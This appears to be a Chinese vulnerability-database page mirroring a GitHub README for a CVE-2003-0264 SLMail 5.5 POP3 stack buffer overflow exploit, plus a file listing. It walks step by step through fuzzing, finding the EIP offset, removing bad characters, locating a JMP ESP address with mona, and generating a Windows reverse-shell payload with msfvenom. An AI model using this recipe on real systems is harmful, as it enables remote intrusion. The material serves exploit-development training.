漏洞平台

POC详情： 101bdfc94413e1c63fb7a9520088db108ef3d5f2

来源

https://github.com/vrikodar/CVE-2003-0264_EXPLOIT

关联漏洞

标题： SLMail安全漏洞 (CVE-2003-0264)
描述：SLMail 5.1.0.4420版本存在安全漏洞。远程攻击者可以通过(1)slmail.exe中的超长EHLO 参数，(2) slmail.exe中的超长XTRN参数，(3) POPPASSWD中的超长字符串，或(4)POP3服务器中的超长密码执行任意代码。

描述

Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3

介绍

# CVE-2003-0264_EXPLOIT
Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3

*`Simple STACK BAsed BUffer Overflow Step By Step`*

# 1) FUZZ The Application

`In the very First Step we will Fuzz The Application With a Simple Spike Script`

`meanwhile we wil also have SLmail attached[and running] to immunity Debugger`

*More On Spike:: https://resources.infosecinstitute.com/topic/intro-to-fuzzing/*

*In Here is a Simple Spike Script named spike_fuzz.spk*

`we will run it against the application using command`

      line_send_tcp 192.168.1.117 110 spike_fuzz.spk

`where 192.168.1.117 is the IP of Target Machine Running SLMail and it is Running On Port 110`

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/spike-fuzz.gif)

*Meanwhile if we see immunity we will see that the application has crashed*

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/spike-fuzz.png)


# 2) POC For Replicating the Crash

`Now we will create a python POC that Replicates the crash and calculates the bytes at which the application crashes`

               python poc_crash.py

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/poc-crash.gif)

# 3) Finding The Offset

`For Finding the offset we will utilize msf`


          1. First Generate a pattern
          2. Note the EIP
          3. Query that EIP and Length with MSF to Find the Offset


`msf-pattern_create -l 2700`

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/msf-pattern_create.png)

*In poc_offset.py we will utilize this pattern as our Overflow Buffer!*

           python poc_offset.py

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/poc-offset.gif)

*At this Point we also Note the EIP Value in immunity where the Application has crashed and paused*

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/eip.png)


            EIP is 39694438
            ::For Finding Offset::
            
            msf-pattern_offset -l 2700 -q 39694438

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/offset.png)

*offset is 2606 means 2606 bytes Before we reach EIP::: and EIP itself is 4bytes Long*

# 4) Controlling The EIP

`Now we will Try TO Overwrite the EIP with 4B's ie:: in immunity we should have 42424242 {Hex for 4 B's}`

            python poc_eip_control.py

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/poc-eip-control.gif)

*And Now if we Check immunity*

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/poc_eip_control.png)

# 5) Finding Bad Chrachters

`To keep this simple and short`

*You can run the poc_badchars.py script and  then Find Bad Chrachters yourself*

`For Keeping this short`

*This application has two bad charachters {which are also the default ones} when we run the poc_badchars.py first time we will see that the charcahter \x0a acts up and then we will remove this from our bad chars payload and then run the script again ,,, second time we will see that the charcahter \x0d is skipped so this is our second bad char and we remove it from our payload :: after this when we run the script third time everything is clear and good!!*

            badchars are :: \x00\x0a\x0d
            {nullbyte, Line feed, carriage return}

            python poc_badchars.py

# 6) Finding The Rigth Module and address

`First we Find the right Module using Mona Modules in immunity`

                  slmfc.dll is the most appropriate candidate as it does not have memory protections!

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/right_module.png)

`and now we find a JMP ESP address in this DLL`

`This address will be written to EIP so that we can redirect the Execution of Program to ESP which will result in the Execution of our shellcode!`

            !mona find -s "\xff\xe4" -m slmfc.dll
            
            {\xff\xe4 opcode equivalent of JMP ESP}

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/jmp_esp.png)

`from 19 pointer addresses we choose the First one`

# 7) Dropping A Shell

`Now We will Put all this Together and Drop a Shell`

                  1.) generate the shell code {excluding badchars}
                  2.) adding the address we Found {remeber Little Endian}
                  3.) Add the buffer , return address, some nop-sleds, shellcode
                  4.) we have a shell

*Lets Quicly Generate shell code using msfvenom*

            msfvenom -p windows/shell_reverse_tcp LHOST=<lstening-ip> LPORT=<listening-port> EXITFUNC=thread -f py -a x86 -b "\x00\x0a\x0d"

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/shellcode.gif)

*WE put everything together in exploit.py File*

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/all.gif)

*Now this time we run SLmail without immunity and also Listen For Incoming Conncections simuntaneously*

`once done with This we will run the Final exploit.py script!`

![Capture](https://github.com/SxNade/SxNade.github.io/blob/main/shell.gif)

**EXCELLENT WE HAVE A SHELL!**

文件快照


 [4.0K]  /data/pocs/101bdfc94413e1c63fb7a9520088db108ef3d5f2
├── [2.2K]  exploit.py
├── [1.0K]  LICENSE
├── [1.6K]  poc_badchars.py
├── [ 532]  poc_crash.py
├── [ 507]  poc_eip_control.py
├── [3.1K]  poc_offset.py
├── [4.9K]  README.md
└── [ 152]  spike_fuzz.spk

0 directories, 8 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。